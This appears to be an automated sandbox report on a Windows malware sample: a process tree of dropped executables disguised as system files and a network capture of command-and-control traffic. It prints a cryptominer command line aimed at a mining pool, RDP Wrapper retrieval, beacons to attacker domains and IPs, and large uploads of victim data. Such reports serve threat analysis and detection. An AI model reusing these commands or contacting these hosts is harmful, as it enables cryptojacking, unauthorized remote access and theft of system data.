C:\Programdata\RealtekHD\taskhost.exeC:\Programdata\RealtekHD\taskhost.exe1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: GetForegroundWindowSpam
PID:4484 -
C:\Programdata\WindowsTask\winlogon.exeC:\Programdata\WindowsTask\winlogon.exe2⤵
- Executes dropped EXE
PID:4432 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /C schtasks /query /fo list3⤵PID:4560
-
C:\Windows\SysWOW64\schtasks.exeschtasks /query /fo list4⤵PID:4624
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ipconfig /flushdns2⤵PID:4380
-
C:\Windows\system32\ipconfig.exeipconfig /flushdns3⤵
- Gathers network information
PID:4424
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c gpupdate /force2⤵PID:4592
-
C:\Windows\system32\gpupdate.exegpupdate /force3⤵PID:4836
-
-
-
C:\ProgramData\WindowsTask\audiodg.exeC:\ProgramData\WindowsTask\audiodg.exe2⤵
- Executes dropped EXE
PID:4396
-
-
C:\ProgramData\WindowsTask\MicrosoftHost.exeC:\ProgramData\WindowsTask\MicrosoftHost.exe -o stratum+tcp://loders.xyz:3333 -u CPU --donate-level=1 -k -t12⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4640
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s TermService1⤵PID:5028
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:4568
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵PID:4244
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:4424
Network
-
Remote address:8.8.8.8:53Requestrms-server.tektonit.ruIN AResponserms-server.tektonit.ruIN A185.175.44.167
-
Remote address:8.8.8.8:53Requestip-api.comIN AResponseip-api.comIN A208.95.112.1
-
Remote address:208.95.112.1:80RequestGET /json HTTP/1.1
User-Agent: AutoIt
Host: ip-api.com
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8
Content-Length: 322
Access-Control-Allow-Origin: *
X-Ttl: 48
X-Rl: 43
-
Remote address:8.8.8.8:53Requestfreemail.freehost.com.uaIN AResponsefreemail.freehost.com.uaIN A194.0.200.251
-
Remote address:8.8.8.8:53Requestwininit.clubIN AResponsewininit.clubIN A109.248.11.138
-
Remote address:109.248.11.138:80RequestGET /STATUS.html HTTP/1.1
User-Agent: AutoIt
Host: wininit.club
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.25 (Debian)
Last-Modified: Wed, 23 Sep 2020 12:26:16 GMT
ETag: "6-5affa30aaa2a7"
Accept-Ranges: bytes
Content-Length: 6
Content-Type: text/html
-
Remote address:109.248.11.138:80RequestGET /L.html HTTP/1.1
User-Agent: AutoIt
Host: wininit.club
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.25 (Debian)
Last-Modified: Wed, 23 Sep 2020 11:35:58 GMT
ETag: "4-5aff97cbe9aa2"
Accept-Ranges: bytes
Content-Length: 4
Content-Type: text/html
-
Remote address:109.248.11.138:80RequestGET /P.html HTTP/1.1
User-Agent: AutoIt
Host: wininit.club
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.25 (Debian)
Last-Modified: Wed, 23 Sep 2020 11:35:58 GMT
ETag: "c-5aff97cbe0e04"
Accept-Ranges: bytes
Content-Length: 12
Content-Type: text/html
-
Remote address:109.248.11.138:80RequestGET /S.html HTTP/1.1
User-Agent: AutoIt
Host: wininit.club
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.25 (Debian)
Last-Modified: Wed, 23 Sep 2020 11:35:58 GMT
ETag: "d-5aff97cbc970a"
Accept-Ranges: bytes
Content-Length: 13
Content-Type: text/html
-
Remote address:8.8.8.8:53Requestwininit.clubIN AResponsewininit.clubIN A109.248.11.138
-
Remote address:109.248.11.138:80RequestGET /L2.html HTTP/1.1
User-Agent: AutoIt
Host: wininit.club
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.25 (Debian)
Last-Modified: Wed, 23 Sep 2020 11:37:46 GMT
ETag: "6-5aff98331e094"
Accept-Ranges: bytes
Content-Length: 6
Content-Type: text/html
-
Remote address:109.248.11.138:80RequestGET /L.html HTTP/1.1
User-Agent: AutoIt
Host: wininit.club
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.25 (Debian)
Last-Modified: Wed, 23 Sep 2020 11:35:58 GMT
ETag: "4-5aff97cbe9aa2"
Accept-Ranges: bytes
Content-Length: 4
Content-Type: text/html
-
Remote address:109.248.11.138:80RequestGET /P.html HTTP/1.1
User-Agent: AutoIt
Host: wininit.club
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.25 (Debian)
Last-Modified: Wed, 23 Sep 2020 11:35:58 GMT
ETag: "c-5aff97cbe0e04"
Accept-Ranges: bytes
Content-Length: 12
Content-Type: text/html
-
Remote address:109.248.11.138:80RequestGET /S.html HTTP/1.1
User-Agent: AutoIt
Host: wininit.club
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.25 (Debian)
Last-Modified: Wed, 23 Sep 2020 11:35:58 GMT
ETag: "d-5aff97cbc970a"
Accept-Ranges: bytes
Content-Length: 13
Content-Type: text/html
-
Remote address:8.8.8.8:53Requestdashost.clubIN AResponsedashost.clubIN A185.212.148.107
-
Remote address:185.212.148.107:80RequestGET /ex20mac/STATUS.html HTTP/1.1
User-Agent: AutoIt
Host: dashost.club
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.25 (Debian)
Last-Modified: Wed, 23 Sep 2020 05:32:07 GMT
ETag: "6-5aff46784bb87"
Accept-Ranges: bytes
Content-Length: 6
Content-Type: text/html
-
Remote address:185.212.148.107:80RequestGET /ex20mac/loaderTOP.html HTTP/1.1
User-Agent: AutoIt
Host: dashost.club
Cache-Control: no-cache
ResponseHTTP/1.1 404 Not Found
Server: Apache/2.4.25 (Debian)
Content-Length: 274
Content-Type: text/html; charset=iso-8859-1
-
Remote address:185.212.148.107:80RequestGET /LTC.html HTTP/1.1
User-Agent: AutoIt
Host: dashost.club
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.25 (Debian)
Last-Modified: Wed, 23 Sep 2020 05:32:00 GMT
ETag: "22-5aff4671e9f6e"
Accept-Ranges: bytes
Content-Length: 34
Content-Type: text/html
-
Remote address:185.212.148.107:80RequestGET /BTC.html HTTP/1.1
User-Agent: AutoIt
Host: dashost.club
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.25 (Debian)
Last-Modified: Wed, 23 Sep 2020 05:31:59 GMT
ETag: "22-5aff46713647c"
Accept-Ranges: bytes
Content-Length: 34
Content-Type: text/html
-
Remote address:185.212.148.107:80RequestGET /ETH.html HTTP/1.1
User-Agent: AutoIt
Host: dashost.club
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.25 (Debian)
Last-Modified: Wed, 23 Sep 2020 05:32:00 GMT
ETag: "2a-5aff467198e94"
Accept-Ranges: bytes
Content-Length: 42
Content-Type: text/html
-
Remote address:185.212.148.107:80RequestGET /ZEC.html HTTP/1.1
User-Agent: AutoIt
Host: dashost.club
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.25 (Debian)
Last-Modified: Wed, 23 Sep 2020 05:32:00 GMT
ETag: "23-5aff467226829"
Accept-Ranges: bytes
Content-Length: 35
Content-Type: text/html
-
Remote address:185.212.148.107:80RequestGET /DOGE.html HTTP/1.1
User-Agent: AutoIt
Host: dashost.club
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.25 (Debian)
Last-Modified: Wed, 23 Sep 2020 05:32:00 GMT
ETag: "22-5aff46717b9d7"
Accept-Ranges: bytes
Content-Length: 34
Content-Type: text/html
-
Remote address:185.212.148.107:80RequestGET /ex20mac/Login.html HTTP/1.1
User-Agent: AutoIt
Host: dashost.club
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.25 (Debian)
Last-Modified: Wed, 23 Sep 2020 05:32:07 GMT
ETag: "4-5aff46782796a"
Accept-Ranges: bytes
Content-Length: 4
Content-Type: text/html
-
Remote address:185.212.148.107:80RequestGET /ex20mac/Password.html HTTP/1.1
User-Agent: AutoIt
Host: dashost.club
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.25 (Debian)
Last-Modified: Wed, 23 Sep 2020 05:32:07 GMT
ETag: "c-5aff46782d72a"
Accept-Ranges: bytes
Content-Length: 12
Content-Type: text/html
-
Remote address:185.212.148.107:80RequestGET /ex20mac/Server.html HTTP/1.1
User-Agent: AutoIt
Host: dashost.club
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.25 (Debian)
Last-Modified: Wed, 23 Sep 2020 12:01:17 GMT
ETag: "e-5aff9d755a10d"
Accept-Ranges: bytes
Content-Length: 14
Content-Type: text/html
-
Remote address:185.212.148.107:80RequestGET /ex20mac/configCPUX.html HTTP/1.1
User-Agent: AutoIt
Host: dashost.club
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.25 (Debian)
Last-Modified: Wed, 23 Sep 2020 05:32:06 GMT
ETag: "6b-5aff4677b0734"
Accept-Ranges: bytes
Content-Length: 107
Vary: Accept-Encoding
Content-Type: text/html
-
Remote address:185.212.148.107:80RequestGET /LTC.html HTTP/1.1
User-Agent: AutoIt
Host: dashost.club
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.25 (Debian)
Last-Modified: Wed, 23 Sep 2020 05:32:00 GMT
ETag: "22-5aff4671e9f6e"
Accept-Ranges: bytes
Content-Length: 34
Content-Type: text/html
-
Remote address:185.212.148.107:80RequestGET /BTC.html HTTP/1.1
User-Agent: AutoIt
Host: dashost.club
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.25 (Debian)
Last-Modified: Wed, 23 Sep 2020 05:31:59 GMT
ETag: "22-5aff46713647c"
Accept-Ranges: bytes
Content-Length: 34
Content-Type: text/html
-
Remote address:185.212.148.107:80RequestGET /ETH.html HTTP/1.1
User-Agent: AutoIt
Host: dashost.club
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.25 (Debian)
Last-Modified: Wed, 23 Sep 2020 05:32:00 GMT
ETag: "2a-5aff467198e94"
Accept-Ranges: bytes
Content-Length: 42
Content-Type: text/html
-
Remote address:185.212.148.107:80RequestGET /ZEC.html HTTP/1.1
User-Agent: AutoIt
Host: dashost.club
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.25 (Debian)
Last-Modified: Wed, 23 Sep 2020 05:32:00 GMT
ETag: "23-5aff467226829"
Accept-Ranges: bytes
Content-Length: 35
Content-Type: text/html
-
Remote address:185.212.148.107:80RequestGET /DOGE.html HTTP/1.1
User-Agent: AutoIt
Host: dashost.club
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.25 (Debian)
Last-Modified: Wed, 23 Sep 2020 05:32:00 GMT
ETag: "22-5aff46717b9d7"
Accept-Ranges: bytes
Content-Length: 34
Content-Type: text/html
-
Remote address:8.8.8.8:53Requeststcubegames.netxi.inIN AResponsestcubegames.netxi.inIN A185.143.145.9
-
Remote address:185.143.145.9:80RequestPOST /index.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Host: stcubegames.netxi.in
Content-Length: 101
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/7.1.33
Vary: Accept-Encoding
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
-
Remote address:185.143.145.9:80RequestPOST /index.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Host: stcubegames.netxi.in
Content-Length: 4417
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/7.1.33
Vary: Accept-Encoding
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
-
Remote address:8.8.8.8:53Requestraw.githubusercontent.comIN AResponseraw.githubusercontent.comIN CNAMEgithub.map.fastly.netgithub.map.fastly.netIN A151.101.0.133github.map.fastly.netIN A151.101.64.133github.map.fastly.netIN A151.101.128.133github.map.fastly.netIN A151.101.192.133
-
Remote address:151.101.0.133:443RequestGET /stascorp/rdpwrap/master/res/rdpwrap.ini HTTP/1.1
User-Agent: RDP Wrapper Update
Host: raw.githubusercontent.com
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Content-Length: 126604
Content-Type: text/plain; charset=utf-8
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
ETag: "ff6f7c1136ec33d71e74660fded1c5ee496fc5f36541436dc7e4b7c03f0f75a4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
Via: 1.1 varnish (Varnish/6.0), 1.1 varnish
X-GitHub-Request-Id: 77CC:215E:162CC17:174CC85:5FB4DBD8
Accept-Ranges: bytes
Date: Wed, 18 Nov 2020 13:40:52 GMT
X-Served-By: cache-ams21063-AMS
X-Cache: HIT, HIT
X-Cache-Hits: 3, 1
X-Timer: S1605706852.196012,VS0,VE1
Vary: Authorization,Accept-Encoding, Accept-Encoding
Access-Control-Allow-Origin: *
X-Fastly-Request-ID: e0d1506eedd57427870340371a5a28b4f6feb6a4
Expires: Wed, 18 Nov 2020 13:45:52 GMT
Source-Age: 103
-
Remote address:8.8.8.8:53Requestiplogger.orgIN AResponseiplogger.orgIN A88.99.66.31
-
Remote address:88.99.66.31:443RequestGET /1qW3y7 HTTP/1.1
User-Agent: UserName: Admin / System: Windows 10 X64 / GPU: SeaBIOS VBE(C) 2011 / RAM: 4 / CPU: Persocon Processor 2.5+, 2 Cores (Session: 26444)
Host: iplogger.org
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Wed, 18 Nov 2020 13:40:54 GMT
Content-Type: image/png
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=oo6moggetpd61vt6j76plblok6; path=/; HttpOnly
Pragma: no-cache
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Answers:
whoami: 47352d4554663a59d80759e37d0d0d37790bef9cc35fcdd15935e3650cb30a7f
Strict-Transport-Security: max-age=31536000; preload
X-Frame-Options: DENY
-
Remote address:8.8.8.8:53Requestraw.githubusercontent.comIN AResponseraw.githubusercontent.comIN CNAMEgithub.map.fastly.netgithub.map.fastly.netIN A151.101.0.133github.map.fastly.netIN A151.101.64.133github.map.fastly.netIN A151.101.128.133github.map.fastly.netIN A151.101.192.133
-
Remote address:151.101.0.133:443RequestGET /stascorp/rdpwrap/master/res/rdpwrap.ini HTTP/1.1
User-Agent: RDP Wrapper Update
Host: raw.githubusercontent.com
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Content-Length: 126604
Content-Type: text/plain; charset=utf-8
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
ETag: "ff6f7c1136ec33d71e74660fded1c5ee496fc5f36541436dc7e4b7c03f0f75a4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
Via: 1.1 varnish (Varnish/6.0), 1.1 varnish
X-GitHub-Request-Id: 77CC:215E:162CC17:174CC85:5FB4DBD8
Accept-Ranges: bytes
Date: Wed, 18 Nov 2020 13:40:55 GMT
X-Served-By: cache-ams21070-AMS
X-Cache: HIT, HIT
X-Cache-Hits: 3, 1
X-Timer: S1605706855.206239,VS0,VE1
Vary: Authorization,Accept-Encoding, Accept-Encoding
Access-Control-Allow-Origin: *
X-Fastly-Request-ID: 51477f7d015767cb2562bc4474ee7a1c88d1208f
Expires: Wed, 18 Nov 2020 13:45:55 GMT
Source-Age: 106
-
Remote address:109.248.11.161:35253RequestPOST /IRemotePanel HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/IRemotePanel/GetSettings"
Host: 109.248.11.161:35253
Content-Length: 136
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Wed, 18 Nov 2020 13:40:56 GMT
-
Remote address:109.248.11.161:35253RequestPOST /IRemotePanel HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/IRemotePanel/SendClientInfo"
Host: 109.248.11.161:35253
Content-Length: 2832524
Expect: 100-continue
Accept-Encoding: gzip, deflate
ResponseHTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Wed, 18 Nov 2020 13:41:03 GMT
-
Remote address:109.248.11.161:35253RequestPOST /IRemotePanel HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/IRemotePanel/GetTasks"
Host: 109.248.11.161:35253
Content-Length: 583867
Expect: 100-continue
Accept-Encoding: gzip, deflate
ResponseHTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Wed, 18 Nov 2020 13:41:03 GMT
-
Remote address:8.8.8.8:53Requestapi.ip.sbIN AResponseapi.ip.sbIN CNAMEapi.ip.sb.cdn.cloudflare.netapi.ip.sb.cdn.cloudflare.netIN A104.26.12.31api.ip.sb.cdn.cloudflare.netIN A172.67.75.172api.ip.sb.cdn.cloudflare.netIN A104.26.13.31
-
Remote address:104.26.12.31:443RequestGET /geoip HTTP/1.1
Host: api.ip.sb
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8
Content-Length: 285
Connection: keep-alive
Set-Cookie: __cfduid=dc515cde5967682d0c746fe8a8af81c6e1605706857; expires=Fri, 18-Dec-20 13:40:57 GMT; path=/; domain=.ip.sb; HttpOnly; SameSite=Lax
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: no-cache
Access-Control-Allow-Origin: *
CF-Cache-Status: DYNAMIC
cf-request-id: 067d2f52f80000d8edd3297000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=wOIpaFkIOmg6pBnjDW6IEZkYf1pxy7TJ8r%2BTs7DfobsT9npOBZRZ5PDRk22nQQM%2BCdZJ7MC6m0zT8kiIUt42%2B33tc13%2FBxtVH6Q%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Server: cloudflare
CF-RAY: 5f421b318be4d8ed-AMS
-
Remote address:8.8.8.8:53Requestcheckip.amazonaws.comIN AResponsecheckip.amazonaws.comIN CNAMEcheckip.check-ip.aws.a2z.comcheckip.check-ip.aws.a2z.comIN CNAMEcheckip.us-east-1.prod.check-ip.aws.a2z.comcheckip.us-east-1.prod.check-ip.aws.a2z.comIN A52.206.184.85checkip.us-east-1.prod.check-ip.aws.a2z.comIN A34.200.69.241checkip.us-east-1.prod.check-ip.aws.a2z.comIN A107.21.162.206checkip.us-east-1.prod.check-ip.aws.a2z.comIN A18.209.89.50checkip.us-east-1.prod.check-ip.aws.a2z.comIN A52.20.197.7checkip.us-east-1.prod.check-ip.aws.a2z.comIN A52.204.109.97checkip.us-east-1.prod.check-ip.aws.a2z.comIN A23.21.27.29checkip.us-east-1.prod.check-ip.aws.a2z.comIN A3.222.126.94
-
Remote address:8.8.8.8:53Requestiplogger.orgIN AResponseiplogger.orgIN A88.99.66.31
-
Remote address:88.99.66.31:443RequestGET /1B2Cw7 HTTP/1.1
User-Agent: UserName: Admin / System: Windows 10 X64 / GPU: SeaBIOS VBE(C) 2011 / RAM: 4 / CPU: Persocon Processor 2.5+, 2 Cores (Session: 80801)
Host: iplogger.org
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Wed, 18 Nov 2020 13:40:57 GMT
Content-Type: image/png
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=1t0cj29pni5fg4jvu99a7j1pv4; path=/; HttpOnly
Pragma: no-cache
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Answers:
whoami: 59f4dd9a694e2487eb52fdab974df495f688f056de5f54acf0a5e9c72cca29b9
Strict-Transport-Security: max-age=31536000; preload
X-Frame-Options: DENY
-
Remote address:52.206.184.85:80RequestGET / HTTP/1.1
Host: checkip.amazonaws.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Server: lighttpd/1.4.53
Content-Length: 13
Connection: keep-alive
-
Remote address:8.8.8.8:53Requestwhois.iana.orgIN AResponsewhois.iana.orgIN CNAMEianawhois.vip.icann.orgianawhois.vip.icann.orgIN A192.0.32.59
-
Remote address:8.8.8.8:53RequestWHOIS.AFRINIC.NETIN AResponseWHOIS.AFRINIC.NETIN CNAMEwhois-public.AFRINIC.NETwhois-public.AFRINIC.NETIN A196.192.115.21whois-public.AFRINIC.NETIN A196.216.2.20whois-public.AFRINIC.NETIN A196.216.2.21
-
Remote address:8.8.8.8:53Requestwww.geoplugin.netIN AResponsewww.geoplugin.netIN CNAMEgeoplugin.netgeoplugin.netIN A178.237.33.50
-
Remote address:178.237.33.50:80RequestGET /json.gp?ip=154.61.71.51 HTTP/1.1
Host: www.geoplugin.net
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Content-Length: 930
Connection: keep-alive
Server: Apache
Access-Control-Allow-Origin: *
-
Remote address:8.8.8.8:53Requestwhois.iana.orgIN AResponsewhois.iana.orgIN CNAMEianawhois.vip.icann.orgianawhois.vip.icann.orgIN A192.0.32.59
-
Remote address:8.8.8.8:53RequestWHOIS.AFRINIC.NETIN AResponseWHOIS.AFRINIC.NETIN CNAMEwhois-public.AFRINIC.NETwhois-public.AFRINIC.NETIN A196.192.115.21whois-public.AFRINIC.NETIN A196.216.2.20whois-public.AFRINIC.NETIN A196.216.2.21
-
Remote address:8.8.8.8:53Requestloders.xyzIN AResponseloders.xyzIN A193.109.79.176
-
Remote address:8.8.8.8:53Requestdashost2.xyzIN AResponsedashost2.xyzIN A194.147.78.109
-
Remote address:194.147.78.109:80RequestGET /randomx/STATUS.html HTTP/1.1
User-Agent: AutoIt
Host: dashost2.xyz
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.25 (Debian)
Last-Modified: Fri, 13 Nov 2020 15:15:41 GMT
ETag: "6-5b3fe806f1e18"
Accept-Ranges: bytes
Content-Length: 6
Content-Type: text/html
-
Remote address:194.147.78.109:80RequestGET /LTC.html HTTP/1.1
User-Agent: AutoIt
Host: dashost2.xyz
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.25 (Debian)
Last-Modified: Tue, 22 Sep 2020 20:21:28 GMT
ETag: "22-5afecb6476e6e"
Accept-Ranges: bytes
Content-Length: 34
Content-Type: text/html
-
Remote address:8.8.8.8:53Requestwininit.clubIN AResponsewininit.clubIN A109.248.11.138
-
Remote address:109.248.11.138:80RequestGET /d/web.html HTTP/1.1
User-Agent: AutoIt
Host: wininit.club
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.25 (Debian)
Last-Modified: Tue, 13 Oct 2020 21:00:53 GMT
ETag: "e-5b193b5dea71b"
Accept-Ranges: bytes
Content-Length: 14
Content-Type: text/html
-
1.3kB 407 B 8 7
-
315 B 591 B 5 2
HTTP Request
GET http://ip-api.com/jsonHTTP Response
200 -
4.5kB 5.1kB 20 21
-
849 B 1.2kB 11 7
HTTP Request
GET http://wininit.club/STATUS.htmlHTTP Response
200HTTP Request
GET http://wininit.club/L.htmlHTTP Response
200HTTP Request
GET http://wininit.club/P.htmlHTTP Response
200HTTP Request
GET http://wininit.club/S.htmlHTTP Response
200 -
891 B 1.2kB 12 7
HTTP Request
GET http://wininit.club/L2.htmlHTTP Response
200HTTP Request
GET http://wininit.club/L.htmlHTTP Response
200HTTP Request
GET http://wininit.club/P.htmlHTTP Response
200HTTP Request
GET http://wininit.club/S.htmlHTTP Response
200 -
3.1kB 5.1kB 35 19
HTTP Request
GET http://dashost.club/ex20mac/STATUS.htmlHTTP Response
200HTTP Request
GET http://dashost.club/ex20mac/loaderTOP.htmlHTTP Response
404HTTP Request
GET http://dashost.club/LTC.htmlHTTP Response
200HTTP Request
GET http://dashost.club/BTC.htmlHTTP Response
200HTTP Request
GET http://dashost.club/ETH.htmlHTTP Response
200HTTP Request
GET http://dashost.club/ZEC.htmlHTTP Response
200HTTP Request
GET http://dashost.club/DOGE.htmlHTTP Response
200HTTP Request
GET http://dashost.club/ex20mac/Login.htmlHTTP Response
200HTTP Request
GET http://dashost.club/ex20mac/Password.htmlHTTP Response
200HTTP Request
GET http://dashost.club/ex20mac/Server.htmlHTTP Response
200HTTP Request
GET http://dashost.club/ex20mac/configCPUX.htmlHTTP Response
200HTTP Request
GET http://dashost.club/LTC.htmlHTTP Response
200HTTP Request
GET http://dashost.club/BTC.htmlHTTP Response
200HTTP Request
GET http://dashost.club/ETH.htmlHTTP Response
200HTTP Request
GET http://dashost.club/ZEC.htmlHTTP Response
200HTTP Request
GET http://dashost.club/DOGE.htmlHTTP Response
200 -
1.3kB 1.1kB 26 16
-
41.3kB 1.3MB 898 897
-
512 B 39.1kB 11 27
-
1.3kB 1.1kB 26 16
-
604 B 45.1kB 13 31
-
12.2kB 394.1kB 266 265
-
149.3kB 4.6MB 3117 3113
HTTP Request
POST http://stcubegames.netxi.in/index.phpHTTP Response
200HTTP Request
POST http://stcubegames.netxi.in/index.phpHTTP Response
200 -
151.101.0.133:443https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.initls, httpRDPWInst.exe5.1kB 138.3kB 101 97
HTTP Request
GET https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.iniHTTP Response
200 -
992 B 4.4kB 10 7
HTTP Request
GET https://iplogger.org/1qW3y7HTTP Response
200 -
151.101.0.133:443https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.initls, httpRDPWInst.exe5.1kB 138.3kB 101 97
HTTP Request
GET https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.iniHTTP Response
200 -
438 B 369 B 9 7
-
3.5MB 19.9kB 2350 449
HTTP Request
POST http://109.248.11.161:35253/IRemotePanelHTTP Response
200HTTP Request
POST http://109.248.11.161:35253/IRemotePanelHTTP Response
200HTTP Request
POST http://109.248.11.161:35253/IRemotePanelHTTP Response
200 -
438 B 329 B 9 6
-
707 B 4.3kB 8 8
HTTP Request
GET https://api.ip.sb/geoipHTTP Response
200 -
1.0kB 4.4kB 11 7
HTTP Request
GET https://iplogger.org/1B2Cw7HTTP Response
200 -
301 B 262 B 5 3
HTTP Request
GET http://checkip.amazonaws.com/HTTP Response
200 -
1.3kB 1.1kB 27 15
-
244 B 492 B 5 4
-
604 B 45.1kB 13 31
-
336 B 2.6kB 7 6
-
37.7kB 1.2MB 820 819
-
788 B 778 B 16 12
-
366 B 1.3kB 6 4
HTTP Request
GET http://www.geoplugin.net/json.gp?ip=154.61.71.51HTTP Response
200 -
244 B 492 B 5 4
-
190 B 18.1kB 4 13
-
336 B 2.6kB 7 6
-
778 B 692 B 16 10
-
282 B 24.1kB 6 17
-
647 B 580 B 4 3
-
463 B 664 B 6 4
HTTP Request
GET http://dashost2.xyz/randomx/STATUS.htmlHTTP Response
200HTTP Request
GET http://dashost2.xyz/LTC.htmlHTTP Response
200 -
277 B 372 B 4 3
HTTP Request
GET http://wininit.club/d/web.htmlHTTP Response
200
-
68 B 84 B 1 1
DNS Request
rms-server.tektonit.ru
DNS Response
185.175.44.167
-
56 B 72 B 1 1
DNS Request
ip-api.com
DNS Response
208.95.112.1
-
70 B 86 B 1 1
DNS Request
freemail.freehost.com.ua
DNS Response
194.0.200.251
-
58 B 74 B 1 1
DNS Request
wininit.club
DNS Response
109.248.11.138
-
58 B 74 B 1 1
DNS Request
wininit.club
DNS Response
109.248.11.138
-
58 B 74 B 1 1
DNS Request
dashost.club
DNS Response
185.212.148.107
-
66 B 82 B 1 1
DNS Request
stcubegames.netxi.in
DNS Response
185.143.145.9
-
71 B 170 B 1 1
DNS Request
raw.githubusercontent.com
DNS Response
151.101.0.133151.101.64.133151.101.128.133151.101.192.133
-
58 B 74 B 1 1
DNS Request
iplogger.org
DNS Response
88.99.66.31
-
71 B 170 B 1 1
DNS Request
raw.githubusercontent.com
DNS Response
151.101.0.133151.101.64.133151.101.128.133151.101.192.133
-
55 B 145 B 1 1
DNS Request
api.ip.sb
